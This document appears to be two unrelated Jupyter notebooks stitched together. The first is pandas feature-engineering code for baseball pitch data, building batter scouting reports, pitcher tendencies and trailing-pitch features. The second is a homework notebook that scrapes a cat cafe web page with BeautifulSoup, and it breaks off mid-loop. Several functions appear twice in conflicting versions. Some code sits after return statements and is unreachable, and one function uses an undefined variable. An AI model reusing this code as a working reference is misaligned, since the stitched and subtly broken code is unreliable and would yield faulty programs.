pitches_in_zone_count) * 
100 #for each pitch type category, get the batters stats on balls hit in play stats = ['estimated_woba_using_speedangle', 'babip_value', 'iso_value'] for stat in stats: #drop Nans from the stat column and assign to new subset, for each stat stat_cat_df = cat_df.dropna(subset=[stat]) if stat == 'estimated_woba_using_speedangle': #get the mean avg_est_woba avg_est_woba = stat_cat_df['estimated_woba_using_speedangle'].mean() #assign that value to the batters dictionary batter_dict[cat + '_est_woba'] = avg_est_woba if avg_est_woba == np.nan: print(batter) brk = True break elif stat == 'babip_value': avg_babip = stat_cat_df['babip_value'].mean() batter_dict[cat + '_babip'] = avg_babip else: avg_iso_value = stat_cat_df['iso_value'].mean() batter_dict[cat + '_iso_value'] = avg_iso_value #for unfaced or small sample pitch_types: assign NaNs to his dictionary for that category for cat in unfaced_cats: if cat == 'pitchout': batter_dict[cat + '_perc_faced'] = 0 else: batter_dict[cat + '_perc_faced'] = np.nan batter_dict[cat + '_chase_perc'] = np.nan batter_dict[cat + '_bip_swung_perc'] = np.nan batter_dict[cat + '_taken_strike_perc'] = np.nan batter_dict[cat + '_est_woba'] = np.nan batter_dict[cat + '_babip'] = np.nan batter_dict[cat + '_iso_value'] = np.nan #assign the batter dictionary to the main dictionary of all batters batters_dict[batter] = batter_dict if not brk: print('iteration completed successfully') #make df from the batters dict batters_df = pd.DataFrame.from_dict(batters_dict, orient='index') batters_df = batters_df.reset_index().rename(columns={'index':'batter'}) return batters_df batters_df = make_batters_df(pitches) batters_df.head() def downcast_dtypes(df): df = df.copy() int_cols = df.select_dtypes('int').columns.tolist() float_cols = df.select_dtypes('float').columns.tolist() obj_cols = df.select_dtypes('object').columns.tolist() cat_cols = [] for col in obj_cols: if col == 'pitch_type': continue if len(df[col].unique()) < len(df)/2: cat_cols.append(col) ints = df[int_cols].apply(pd.to_numeric,downcast='unsigned') floats = df[float_cols].apply(pd.to_numeric,downcast='float') cats = df[cat_cols].astype('category') df = df.drop(columns=int_cols + float_cols + cat_cols) for d in [ints, floats, cats]: df = pd.concat([df, d], axis=1) return df def pre_process_step1(combined): df = combined.copy() #convert the pitch type for UN (unknown) to np.nan df['pitch_type'] = df['pitch_type'].replace({'UN':np.nan}) #fix some faulty data that has number of balls listed as 4: df['balls'] = df['balls'].replace({4.0: 3.0}) #count, count_cat, score_diff, on_base 1/0, bases_loaded df = make_game_features(df) #batter_swung, in_strikezone, chased df = make_strikezone_swung_and_chase_features(df) #get aggregate pitcher %s dict from prior data: pitcher_dict = gen_pitcher_percentages(df) #fil the NaNs for pitch_type using randomized guess from pitcher tendencies df = fill_pitch_type_nans(df, pitcher_dict) #pitch_type category feature df = make_pitch_type_cat(df) return df #pass in list of periods to update the data (and fill NaNs) using prior aggregates: def pre_process_step2(pre_processed_step1, start_dates, end_dates): df = pre_processed_step1.copy() #initialize empty list to store dfs (concat them together later) df_list = [] #iterate over each period for i in range(len(start_dates)): #make the prior and current dfs: prior_df = df[df['game_date'] < start_dates[i]] current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])] #add the batter scouting report batters_df = 
make_batters_df(prior_df) current_df = pd.merge(current_df, batters_df, how='left', on='batter') #append the df to the list df_list.append(current_df) step2_df = pd.concat(df_list, sort=False) return step2_df def get_pitch_tendencies(pitcher_df): #assign the normalized value counts for this pitchers pitch types to a dictionary pitcher_tendencies_overall = pitcher_df['pitch_type'].value_counts(normalize=True).to_dict() #initialize empty dict for count categories tendencies pitcher_tendencies_by_count = {} #loop over each count category and get the pitchers tendencies and add to the dict for cat in pitcher_df['count_cat'].unique().tolist(): subset = pitcher_df[pitcher_df['count_cat'] == cat] pitcher_tendencies_by_count[cat] = subset['pitch_type'].value_counts(normalize=True).to_dict() return pitcher_tendencies_overall, pitcher_tendencies_by_count def make_tendency_features(pitcher_df, pitcher_tendencies_overall, pitcher_tendencies_by_count): df = pitcher_df.copy() pitch_types = pitcher_tendencies_overall.keys() for pitch_type in pitch_types: overall_feature = 'overall_' + pitch_type + '_perc' count_cat_feature = 'count_cat_' + pitch_type + '_perc' def get_overall_perc(x): return pitcher_tendencies_overall[x] def get_by_count_perc(x): try: return pitcher_tendencies_by_count[x][pitch_type] except KeyError: return 0 df[overall_feature] = pitch_type df[overall_feature] = df[overall_feature].apply(get_overall_perc) df[count_cat_feature] = df['count_cat'].apply(get_by_count_perc) return df start_dates = ['2018-03-29', '2018-05-01', '2018-06-01', '2018-07-01', '2018-08-01', '2018-09-01', '2019-03-28', '2019-05-01', '2019-06-01', '2019-07-01', '2019-08-01'] end_dates = ['2018-04-30', '2018-05-31', '2018-06-30', '2018-07-31', '2018-08-31', '2018-10-01', '2019-04-30', '2019-05-31', '2019-06-30', '2019-07-31', '2019-08-31'] def add_pitcher_scouting_report(pitcher_df, pitcher_df17, start_dates, end_dates): df = pd.concat([pitcher_df, pitcher_df17], sort=False) #initialize empty list to store dfs (concat them together later) df_list = [] #iterate over each period for i in range(len(start_dates)): #make the prior and current dfs: prior_df = df[df['game_date'] < start_dates[i]] current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])] #get the pitch tendencies from prior: pitcher_tendencies_overall, pitcher_tendencies_by_count = get_pitch_tendencies(prior_df) #make the pitch tendencies features on current: current_df = make_tendency_features(current_df, pitcher_tendencies_overall, pitcher_tendencies_by_count) #append the df to the list df_list.append(current_df) df = pd.concat(df_list, sort=False) return df def make_game_batting_order(game_df): game_df = game_df.sort_values(by=['at_bat_number', 'pitch_number']) all_batters = game_df['batter'].unique().tolist() #re-set the at_bat_number for the game to be sequential starting at 1 at_bat_keys = game_df['at_bat_number'].unique().tolist() at_bat_values = range(1, len(at_bat_keys)+1) at_bat_map = dict(zip(at_bat_keys, at_bat_values)) game_df['at_bat_number'] = game_df['at_bat_number'].replace(at_bat_map) #get the first 9 batter ids first_9_batter_subset = game_df[game_df['at_bat_number'] < 10] first_9_batters = first_9_batter_subset['batter'].unique().tolist() #map the batter id to batting order position 1-9 batting_order_map = dict(zip(first_9_batters, range(1,10))) #for anyone else who bats later in the game, assign 'PH' (pinch hitter) to their batting order slot other_batters = list(set(all_batters) - set(first_9_batters)) if 
len(other_batters) > 0: for batter in other_batters: batting_order_map[batter] = 'PH' try: game_df['batting_order_slot'] = game_df['batter'].apply(lambda x: batting_order_map[x]) except KeyError: game_df = None return game_df game_df['pitcher_AB'] = game_df['batter'].apply(lambda x: True if x in pitcher_list else False) game_df['batting_order_slot'] = game_df['batting_order_slot'].where(game_df['pitcher_AB'] == False, other='pitcher') return game_df def make_game_pitchcount_and_trailing_pitch_features(pitcher_df, pitcher_list): df = pitcher_df.copy() print('#pitches in df before: ' + str(len(df))) pitcher_tendencies_overall, pitcher_tendencies_by_count = get_pitch_tendencies(df) games = df['game_pk'].unique().tolist() #take the first game and make the pitch count feature first_game_df = df[df['game_pk'] == games[0]].copy() first_game_df['pitch_count'] = range(1, first_game_df.shape[0] + 1) #make the L1_pitch type feature: first_game_df['L1_pitch_type'] = first_game_df['pitch_type'].shift(periods=1) first_game_df['L1_pitch_result'] = first_game_df['type'].shift(periods=1) first_game_df['L1_pitch_result'] = first_game_df['L1_pitch_result'].replace({np.nan:'first pitch'}) first_game_df['L1_pitch_zone'] = first_game_df['zone'].shift(periods=1) first_game_df['L1_pitch_zone'] = first_game_df['L1_pitch_zone'].fillna(-1) #overall strike % (to fill in for first 5 pitches L5_strike_perc) overall_strike_perc = df['type'].value_counts(normalize=True)['S'] * 100 #make the trailing 5 pitches: for index, row in first_game_df.iterrows(): #fill NaNs for L1_pitch using same method as when pitch_type was missing if row['pitch_count'] == 1: random_pitch = random.choices(population=list(pitcher_tendencies_overall.keys()), weights=list(pitcher_tendencies_overall.values()), k=1)[0] first_game_df.at[index, 'L1_pitch_type'] = random_pitch #for the first 5 rows, use overall pitcher tendencies if row['pitch_count'] < 6: #fill with overall tendencies for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L5_' + pitch + '_perc' first_game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100 #strike % first_game_df.at[index, 'L5_strike_perc'] = overall_strike_perc else: current_pitch = first_game_df.at[index, 'pitch_count'] #make a subset of the prev 5 pitches subset = first_game_df[(first_game_df['pitch_count'] > current_pitch - 6) & (first_game_df['pitch_count'] < current_pitch)] #grab the value count percentages for the last 5 pitches subset_percentages = subset['pitch_type'].value_counts(normalize=True).to_dict() try: L5_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100 except KeyError: L5_strike_perc = 0 first_game_df.at[index, 'L5_strike_perc'] = L5_strike_perc #iterate over all possible pitch types this pitcher throws: for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L5_' + pitch + '_perc' #if he has thrown that pitch type in last 5 try: first_game_df.at[index, feature] = subset_percentages[pitch] * 100 #except for when he hasnt thrown that type in last 5 except: first_game_df.at[index, feature] = 0 #apply the battting order features to the game: first_game_df = make_game_batting_order(first_game_df) #iterate the same process for the rest of his games: for game in games[1:]: game_df = df[df['game_pk'] == game].copy() #get df for that game only game_df['pitch_count'] = range(1, game_df.shape[0] + 1) #make the pitch count for the game game_df['L1_pitch_type'] = game_df['pitch_type'].shift(periods=1) game_df['L1_pitch_result'] = 
game_df['type'].shift(periods=1) game_df['L1_pitch_result'] = game_df['L1_pitch_result'].replace({np.nan:'first pitch'}) game_df['L1_pitch_zone'] = game_df['zone'].shift(periods=1) game_df['L1_pitch_zone'] = game_df['L1_pitch_zone'].fillna(0) #make the trailing 5 pitches: for index, row in game_df.iterrows(): #fill NaNs for L1_pitch using same method as when pitch_type was missing if row['pitch_count'] == 1: random_pitch = random.choices(population=list(pitcher_tendencies_overall.keys()), weights=list(pitcher_tendencies_overall.values()), k=1)[0] game_df.at[index, 'L1_pitch_type'] = random_pitch if row['pitch_count'] < 6: #fill with overall tendencies for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L5_' + pitch + '_perc' game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100 #strike % game_df.at[index, 'L5_strike_perc'] = overall_strike_perc else: current_pitch = game_df.at[index, 'pitch_count'] subset = game_df[(game_df['pitch_count'] > current_pitch - 6) & (game_df['pitch_count'] < current_pitch)] subset_percentages = subset['pitch_type'].value_counts(normalize=True).to_dict() try: L5_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100 except KeyError: L5_strike_perc = 0 game_df.at[index, 'L5_strike_perc'] = L5_strike_perc for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L5_' + pitch + '_perc' try: game_df.at[index, feature] = subset_percentages[pitch] * 100 except: game_df.at[index, feature] = 0 #apply the battting order features to the game: game_df = make_game_batting_order(game_df) if game_df.empty: print('skipping game because of bat data: ' + str(game)) continue #concatenate that game w/ updated pitch count and trailing pitches w/ prev games if game_df['game_pk'].values[0] == games[1]: new_df = pd.concat([first_game_df, game_df]) #concat the game_df w/ the first game else: new_df = pd.concat([new_df, game_df]) #concat the game_df w/ the previous games print('# pitches in df after: ' + str(len(new_df))) return new_df batter_cols = ['fastball_perc_faced','fastball_chase_perc','fastball_bip_swung_perc', 'fastball_taken_strike_perc', 'fastball_est_woba', 'fastball_babip', 'fastball_iso_value', 'breaking_perc_faced', 'breaking_chase_perc', 'breaking_bip_swung_perc', 'breaking_taken_strike_perc', 'breaking_est_woba', 'breaking_babip', 'breaking_iso_value', 'offspeed_perc_faced', 'offspeed_chase_perc', 'offspeed_bip_swung_perc', 'offspeed_taken_strike_perc', 'offspeed_est_woba', 'offspeed_babip', 'offspeed_iso_value', 'pitchout_perc_faced'] def fill_batting_nans(pitcher_df, batting_order_slot_map): df = pitcher_df.copy() for slot in df['batting_order_slot'].unique().tolist(): subset = df[df['batting_order_slot'] == slot].copy() df = df.drop(subset.index) for col in batter_cols: subset[col] = subset[col].fillna(batting_order_slot_map[slot][col]) df = pd.concat([df, subset]) print('finished w/ slot: ' + str(slot)) return df def get_left_right_pitch_tendencies(pitcher_df): #split the df into left hand and right handed batters left = pitcher_df[pitcher_df['stand'] == 'L'].copy() right = pitcher_df[pitcher_df['stand'] == 'R'].copy() #assign the normalized value counts for this pitchers pitch types to a dictionary overall_left = left['pitch_cat'].value_counts(normalize=True).to_dict() overall_right = right['pitch_cat'].value_counts(normalize=True).to_dict() #initialize empty dict for count categories tendencies by_count_left = {} by_count_right = {} #loop over each count category and get the pitchers tendencies and add to the dict 
for cat in pitcher_df['count_cat'].unique().tolist(): left_subset = left[left['count_cat'] == cat] right_subset = right[right['count_cat'] == cat] by_count_left[cat] = left_subset['pitch_cat'].value_counts(normalize=True).to_dict() by_count_right[cat] = right_subset['pitch_cat'].value_counts(normalize=True).to_dict() return overall_left, overall_right, by_count_left, by_count_right def make_tendency_features(pitcher_df, overall_left, overall_right, by_count_left, by_count_right): #helper functions to vectorize w/ df.apply(): def get_overall_left_perc(x): return overall_left[x] * 100 def get_overall_right_perc(x): return overall_right[x] * 100 def get_by_count_left_perc(x): try: return by_count_left[x][pitch_type] * 100 except KeyError: return 0 def get_by_count_right_perc(x): try: return by_count_right[x][pitch_type] * 100 except KeyError: return 0 left = pitcher_df[pitcher_df['stand'] == 'L'].copy() right = pitcher_df[pitcher_df['stand'] == 'R'].copy() pitch_types_left = overall_left.keys() pitch_types_right = overall_right.keys() #Left for pitch_type in pitch_types_left: overall_feature = 'overall_' + pitch_type + '_perc' count_cat_feature = 'count_cat_' + pitch_type + '_perc' left[overall_feature] = pitch_type left[overall_feature] = left[overall_feature].apply(get_overall_left_perc) left[count_cat_feature] = left['count_cat'].apply(get_by_count_left_perc) #Right for pitch_type in pitch_types_right: overall_feature = 'overall_' + pitch_type + '_perc' count_cat_feature = 'count_cat_' + pitch_type + '_perc' right[overall_feature] = pitch_type right[overall_feature] = right[overall_feature].apply(get_overall_right_perc) right[count_cat_feature] = right['count_cat'].apply(get_by_count_right_perc) return pd.concat([left,right], sort=False).sort_values(by=['game_date', 'game_pk', 'at_bat_number', 'pitch_number']) def add_pitcher_scouting_report(pitcher_df, pitcher_df17, start_dates, end_dates): df = pd.concat([pitcher_df, pitcher_df17], sort=False) #initialize empty list to store dfs (concat them together later) df_list = [] #iterate over each period for i in range(len(start_dates)): #make the prior and current dfs: prior_df = df[df['game_date'] < start_dates[i]] current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])].copy() #get the pitch tendencies from prior: overall_left, overall_right, by_count_left, by_count_right = get_left_right_pitch_tendencies(prior_df) #make the pitch tendencies features on current: current_df = make_tendency_features(current_df, overall_left, overall_right, by_count_left, by_count_right) #append the df to the list df_list.append(current_df) df = pd.concat(df_list, sort=False) return df def make_game_batting_order(game_df): game_df = game_df.sort_values(by=['at_bat_number', 'pitch_number']) all_batters = game_df['batter'].unique().tolist() #re-set the at_bat_number for the game to be sequential starting at 1 at_bat_keys = game_df['at_bat_number'].unique().tolist() at_bat_values = range(1, len(at_bat_keys)+1) at_bat_map = dict(zip(at_bat_keys, at_bat_values)) game_df['at_bat_number'] = game_df['at_bat_number'].replace(at_bat_map) #get the first 9 batter ids first_9_batter_subset = game_df[game_df['at_bat_number'] < 10] first_9_batters = first_9_batter_subset['batter'].unique().tolist() #map the batter id to batting order position 1-9 batting_order_map = dict(zip(first_9_batters, range(1,10))) #for anyone else who bats later in the game, assign 'PH' (pinch hitter) to their batting order slot other_batters = list(set(all_batters) - 
set(first_9_batters)) if len(other_batters) > 0: for batter in other_batters: batting_order_map[batter] = 'PH' try: game_df['batting_order_slot'] = game_df['batter'].apply(lambda x: batting_order_map[x]) except KeyError: game_df = None return game_df game_df['pitcher_AB'] = game_df['batter'].apply(lambda x: True if x in pitcher_list else False) game_df['batting_order_slot'] = game_df['batting_order_slot'].where(game_df['pitcher_AB'] == False, other='pitcher') return game_df def get_pitch_tendencies(pitcher_df): #assign the normalized value counts for this pitchers pitch types to a dictionary pitcher_tendencies_overall = pitcher_df['pitch_cat'].value_counts(normalize=True).to_dict() #initialize empty dict for count categories tendencies pitcher_tendencies_by_count = {} #loop over each count category and get the pitchers tendencies and add to the dict for cat in pitcher_df['count_cat'].unique().tolist(): subset = pitcher_df[pitcher_df['count_cat'] == cat] pitcher_tendencies_by_count[cat] = subset['pitch_cat'].value_counts(normalize=True).to_dict() return pitcher_tendencies_overall, pitcher_tendencies_by_count def make_game_pitchcount_and_trailing_pitch_features_and_batting_order(pitcher_df, pitcher_list): df = pitcher_df.copy() all_games = [] print('#pitches in df before: ' + str(len(df))) pitcher_tendencies_overall, pitcher_tendencies_by_count = get_pitch_tendencies(df) games = df['game_pk'].unique().tolist() for game in games: #take the first game and make the pitch count feature game_df = df[df['game_pk'] == game].copy() game_df['pitch_count'] = range(1, game_df.shape[0] + 1) #make the L1_pitch type feature: game_df['L1_pitch_type'] = game_df['pitch_cat'].shift(periods=1) game_df['L1_pitch_result'] = game_df['type'].shift(periods=1) game_df['L1_pitch_result'] = game_df['L1_pitch_result'].replace({np.nan:'first pitch'}) game_df['L1_pitch_zone'] = game_df['zone'].shift(periods=1) game_df['L1_ball_high'] = game_df['ball_high'].shift(periods=1) game_df['L1_ball_low'] = game_df['ball_low'].shift(periods=1) game_df['L1_ball_left'] = game_df['ball_left'].shift(periods=1) game_df['L1_ball_right'] = game_df['ball_right'].shift(periods=1) game_df[['L1_pitch_zone', 'L1_ball_high', 'L1_ball_low', 'L1_ball_left', 'L1_ball_right']] = game_df[['L1_pitch_zone', 'L1_ball_high', 'L1_ball_low', 'L1_ball_left', 'L1_ball_right']].fillna(-1) #game_df['L1_pitch_zone'] = game_df['L1_pitch_zone'].fillna(-1) #overall strike % (to fill in for first 5 pitches L5_strike_perc) overall_strike_perc = df['type'].value_counts(normalize=True)['S'] * 100 #make the trailing 5 pitches: for index, row in game_df.iterrows(): #fill NaNs for L1_pitch using same method as when pitch_type was missing if row['pitch_count'] == 1: random_pitch = random.choices(population=list(pitcher_tendencies_overall.keys()), weights=list(pitcher_tendencies_overall.values()), k=1)[0] game_df.at[index, 'L1_pitch_type'] = random_pitch #for the first 5 rows, use overall pitcher tendencies if row['pitch_count'] < 6: #fill with overall tendencies for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L5_' + pitch + '_perc' game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100 feature = 'L15_' + pitch + '_perc' game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100 #strike % game_df.at[index, 'L5_strike_perc'] = overall_strike_perc game_df.at[index, 'L15_strike_perc'] = overall_strike_perc else: current_pitch = game_df.at[index, 'pitch_count'] #make a subset of the prev 5 pitches subset = 
game_df[(game_df['pitch_count'] > current_pitch - 6) & (game_df['pitch_count'] < current_pitch)] #grab the value count percentages for the last 5 pitches subset_percentages = subset['pitch_cat'].value_counts(normalize=True).to_dict() try: L5_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100 except KeyError: L5_strike_perc = 0 game_df.at[index, 'L5_strike_perc'] = L5_strike_perc #iterate over all possible pitch types this pitcher throws: for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L5_' + pitch + '_perc' #if he has thrown that pitch type in last 5 try: game_df.at[index, feature] = subset_percentages[pitch] * 100 #except for when he hasnt thrown that type in last 5 except: game_df.at[index, feature] = 0 if row['pitch_count'] < 16: #make a subset of the prev 15 pitches subset = game_df[(game_df['pitch_count'] < current_pitch)] #grab the value count percentages for the last 15 pitches subset_percentages = subset['pitch_cat'].value_counts(normalize=True).to_dict() try: L15_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100 except KeyError: L15_strike_perc = 0 game_df.at[index, 'L15_strike_perc'] = L15_strike_perc #iterate over all possible pitch types this pitcher throws: for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L15_' + pitch + '_perc' #if he has thrown that pitch type in last 15 try: game_df.at[index, feature] = subset_percentages[pitch] * 100 #except for when he hasnt thrown that type in last 5 except: game_df.at[index, feature] = 0 else: #make a subset of the prev 15 pitches subset = game_df[(game_df['pitch_count'] > current_pitch - 16) & (game_df['pitch_count'] < current_pitch)] #grab the value count percentages for the last 5 pitches subset_percentages = subset['pitch_cat'].value_counts(normalize=True).to_dict() try: L15_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100 except KeyError: L15_strike_perc = 0 game_df.at[index, 'L15_strike_perc'] = L15_strike_perc #iterate over all possible pitch types this pitcher throws: for pitch in list(pitcher_tendencies_overall.keys()): feature = 'L15_' + pitch + '_perc' #if he has thrown that pitch type in last 5 try: game_df.at[index, feature] = subset_percentages[pitch] * 100 #except for when he hasnt thrown that type in last 5 except: game_df.at[index, feature] = 0 #apply the battting order features to the game: game_df = make_game_batting_order(game_df) all_games.append(game_df) new_df = pd.concat(all_games).sort_values(by=['game_date', 'game_pk', 'at_bat_number', 'pitch_number']) print('# pitches in df after: ' + str(len(new_df))) return new_df def make_prev_ab_walk_basehit_run_and_homerun_features(pitcher_df): all_games = [] #iterate over each game for game in pitcher_df['game_pk'].unique(): #make subset df for that game game_df = pitcher_df[pitcher_df['game_pk'] == game].copy() #initialize columns to False: game_df['prev_ab_run_scored'] = False game_df['prev_ab_homerun'] = False game_df['prev_ab_walk'] = False game_df['prev_ab_basehit'] = False game_df['prev_ab_strikeout'] = False #this gets the at_bats = game_df['at_bat_number'].sort_values().unique() #initialize empty dicts run_scored = [] homeruns = [] walks = [] basehits = [] strikeouts = [] walks = ['walk', 'hit_by_pitch'] basehits = ['single', 'double', 'triple', 'home_run'] #starting w/ 2nd AB, iterate thru to the end of the at_bats: for ab in at_bats[2:]: #get the index for the last pitch of the prev AB prev_ab_last_pitch_index = game_df[game_df['at_bat_number'] == 
ab-1]['pitch_number'].index.max() #check if the last pitch resulted in a walk or hit by pitch: if game_df.loc[prev_ab_last_pitch_index]['events'] in walks: #if so, add an entry walks.append(ab) #check if last pitch gave up a basehit: elif game_df.loc[prev_ab_last_pitch_index]['events'] in basehits: basehits.append(ab) elif game_df.loc[prev_ab_last_pitch_index]['events'] == 'strikeout': strikeouts.append(ab) #to check if prev AB resulted in a run scoring: compare score before and after the AB prev_score = game_df[game_df['at_bat_number'] == ab-1]['bat_score'].values[0] current_score = game_df[game_df['at_bat_number'] == ab]['bat_score'].values[0] if current_score > prev_score: run_scored.append(ab) #check if last AB gave up a homerun: if game_df.loc[prev_ab_last_pitch_index]['events'] == 'home_run': homeruns.append(ab) #iterate over each at_bat, and add the features to the df where appropriate for ab in at_bats: idx = game_df[game_df['at_bat_number'] == ab].index if ab in walks: game_df.at[idx, 'prev_ab_walk'] = True elif ab in basehits: game_df.at[idx, 'prev_ab_basehit'] = True elif ab in strikeouts: game_df.at[idx, 'prev_ab_strikeout'] = True if ab in run_scored: game_df.at[idx, 'prev_ab_run_scored'] = True if ab in homeruns: game_df.at[idx, 'prev_ab_homerun'] = True all_games.append(game_df) return pd.concat(all_games).sort_values(by=['game_date', 'game_pk', 'pitch_count']) batter_cols = ['fastball_perc_faced','fastball_chase_perc','fastball_bip_swung_perc', 'fastball_taken_strike_perc', 'fastball_est_woba', 'fastball_babip', 'fastball_iso_value', 'breaking_perc_faced', 'breaking_chase_perc', 'breaking_bip_swung_perc', 'breaking_taken_strike_perc', 'breaking_est_woba', 'breaking_babip', 'breaking_iso_value', 'offspeed_perc_faced', 'offspeed_chase_perc', 'offspeed_bip_swung_perc', 'offspeed_taken_strike_perc', 'offspeed_est_woba', 'offspeed_babip', 'offspeed_iso_value', 'pitchout_perc_faced'] def fill_batting_nans(pitcher_df, batting_order_slot_map): df = pitcher_df.copy() for slot in df['batting_order_slot'].unique().tolist(): subset = df[df['batting_order_slot'] == slot].copy() df = df.drop(subset.index) for col in batter_cols: subset[col] = subset[col].fillna(batting_order_slot_map[slot][col]) df = pd.concat([df, subset]) print('finished w/ slot: ' + str(slot)) df = df.sort_values(by=['game_date', 'game_pk', 'pitch_count']) return df def add_pb_matchup_priors(pitcher_df, pitcher_df17, start_dates, end_dates): df = pd.concat([pitcher_df, pitcher_df17], sort=False) #initialize empty list to store dfs (concat them together later) df_list = [] #iterate over each period for i in range(len(start_dates)): #make the prior and current dfs: prior_df = df[df['game_date'] < start_dates[i]] current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])] #get all the pitch_types this pitcher has thrown in the past: pitch_types = prior_df['pitch_cat'].unique().tolist() try: pitch_types.remove('PO') except: pass print(pitch_types) #get a list of the batters in the current_df current_batters = current_df['batter'].unique().tolist() batters_dict = {} current_df_list = [] for batter in current_batters: batter_df_list = [] #first use subset from prior df batter_subset = prior_df[prior_df['batter'] == batter].copy() #if pitcher has never faced this batter before: if batter_subset.empty: #get the left or right handedness of the batter stand = current_df[current_df['batter'] == batter]['stand'].values[0] #use overall prior tendencies vs left or right handed hitters overall, by_count 
= get_pitch_tendencies(prior_df[prior_df['stand'] == stand]) else: overall, by_count = get_pitch_tendencies(batter_subset) batters_dict[batter] = by_count #now use subset of current_df where batter=batter batter_subset = current_df[current_df['batter'] == batter].copy() #iterate over the different count_cat types: for count_cat in ['ahead', 'behind', 'neutral']: count_subset = batter_subset[batter_subset['count_cat'] == count_cat].copy() if count_subset.empty: continue else: for pitch in pitch_types: try: count_subset['PB_'+pitch] = batters_dict[batter][count_cat][pitch] * 100 except KeyError: count_subset['PB_'+pitch] = 0 current_df_list.append(count_subset) current_df = pd.concat(current_df_list, sort=False) df_list.append(current_df) new_df = pd.concat(df_list, sort=False).sort_values(by=['game_date', 'game_pk', 'pitch_count']) return new_df ###Output _____no_output_____
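###Markdown To tie the steps above together, here is a minimal end-to-end sketch (my addition, not part of the original run). It assumes `pitches` still holds the cleaned data and that the helper functions referenced inside `pre_process_step1` (e.g. `make_game_features`, `fill_pitch_type_nans`) are defined elsewhere in the project. ###Code
# Hypothetical end-to-end run over the monthly periods defined above
step1_df = pre_process_step1(pitches)
step2_df = pre_process_step2(step1_df, start_dates, end_dates)
step2_df = downcast_dtypes(step2_df)  # shrink dtypes to save memory before modeling
###Output _____no_output_____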
homework5/Homework_5.ipynb
###Markdown Homework 5This homework presents a sophisticated scenario in which you must design a SQL schema, insert data into it, and issue queries against it. The scenarioIn the year 20XX, I have won the lottery and decided to leave my programming days behind me in order to pursue my true calling as a [cat cafe](https://en.wikipedia.org/wiki/Cat_caf%C3%A9) tycoon. [This webpage](http://static.decontextualize.com/cats.html) lists the locations of my cat cafes and all the cats that are currently in residence at these cafes.I'm interested in doing more detailed analysis of my cat cafe holdings and the cats that are currently being cared for by my cafes. For this reason, I've hired *you* to convert this HTML page into a workable SQL database. (Why don't I just do it myself? Because I am far too busy hanging out with adorable cats in all of my beautiful, beautiful cat cafes.)Specifically, I want to know the answers to the following questions:* What's the name of the youngest cat at any location?* In which zip codes can I find a lilac-colored tabby?* What's the average weight of cats currently residing at any location (grouped by location)?* Which location has the most cats with tortoiseshell coats?Because I'm not paying you very much, and because I am a merciful person who has considerable experience in these matters, I've decided to *write the queries for you*. (See below.) Your job is just to scrape the data from the web page, create the appropriate tables in PostgreSQL, and insert the data into those tables.Before you continue, scroll down to "The Queries" below to examine the queries as I wrote them. Problem set 1: Scraping the dataYour first goal is to create two data structures, both lists of dictionaries: one for the list of locations and one for the list of cats. You'll get these from scraping two `` tags in the HTML: the first table has a class of `cafe-list`, the second has a class of `cat-list`.Before you do anything else, though, execute the following cell to import Beautiful Soup and create a BeautifulSoup object with the content of the web page: ###Code from bs4 import BeautifulSoup from urllib.request import urlopen html = urlopen("http://static.decontextualize.com/cats.html").read() document = BeautifulSoup(html, "html.parser") ###Output _____no_output_____ ###Markdown Let's tackle the list of cafes first. In the cell below, write some code that creates a list of dictionaries with information about each cafe, assigning it to the variable `cafe_list`. I've written some of the code for you; you just need to fill in the rest. The list should end up looking like this:```[{'name': 'Hang In There', 'zip': '11237'}, {'name': 'Independent Claws', 'zip': '11201'}, {'name': 'Paws and Play', 'zip': '11215'}, {'name': 'Tall Tails', 'zip': '11222'}, {'name': 'Cats Meow', 'zip': '11231'}]``` ###Code cafe_list = list() cafe_table = document.find('table', {'class': 'cafe-list'}) tbody = cafe_table.find('tbody') for tr_tag in tbody.find_all('tr'): # print(tr_tag) zip = tr_tag.find('td', {'class': 'zip'}) name = tr_tag.find('td', {'class': 'name'}) # print(name) cafe_dict = {'name': name.text, 'zip': zip.text} cafe_list.append(cafe_dict) #pass # replace "pass" with your code cafe_list ###Output _____no_output_____ ###Markdown Great! In the following cell, write some code that creates a list of cats from the `` tag on the page, storing them as a list of dictionaries in a variable called `cat_list`. Again, I've written a bit of the code for you. 
Expected output:```[{'birthdate': '2015-05-20', 'color': 'black', 'locations': ['Paws and Play', 'Independent Claws*'], 'name': 'Sylvester', 'pattern': 'colorpoint', 'weight': 10.46}, {'birthdate': '2000-01-03', 'color': 'cinnamon', 'locations': ['Independent Claws*'], 'name': 'Jasper', 'pattern': 'solid', 'weight': 8.06}, {'birthdate': '2006-02-27', 'color': 'brown', 'locations': ['Independent Claws*'], 'name': 'Luna', 'pattern': 'tortoiseshell', 'weight': 10.88},[...many records omitted for brevity...] {'birthdate': '1999-01-09', 'color': 'white', 'locations': ['Cats Meow*', 'Independent Claws', 'Tall Tails'], 'name': 'Lafayette', 'pattern': 'tortoiseshell', 'weight': 9.3}]```Note: Observe the data types of the values in each dictionary! Make sure to explicitly convert values retrieved from `.string` attributes of Beautiful Soup tag objects to `str`s using the `str()` function. ###Code cat_list = list() cat_table = document.find('table', {'class': 'cat-list'}) tbody = cat_table.find('tbody') for tr_tag in tbody.find_all('tr'): #print(tr_tag) birthdate = tr_tag.find('td', {'class': 'birthdate'}) if birthdate: birthdate = birthdate.text #if birthdate: # birthdate = birthdate. color = tr_tag.find('td', {'class':'color'}) if color: color = color.text location_ar = [] locations = tr_tag.find_all('td', {'class':'locations'}) for location in locations: 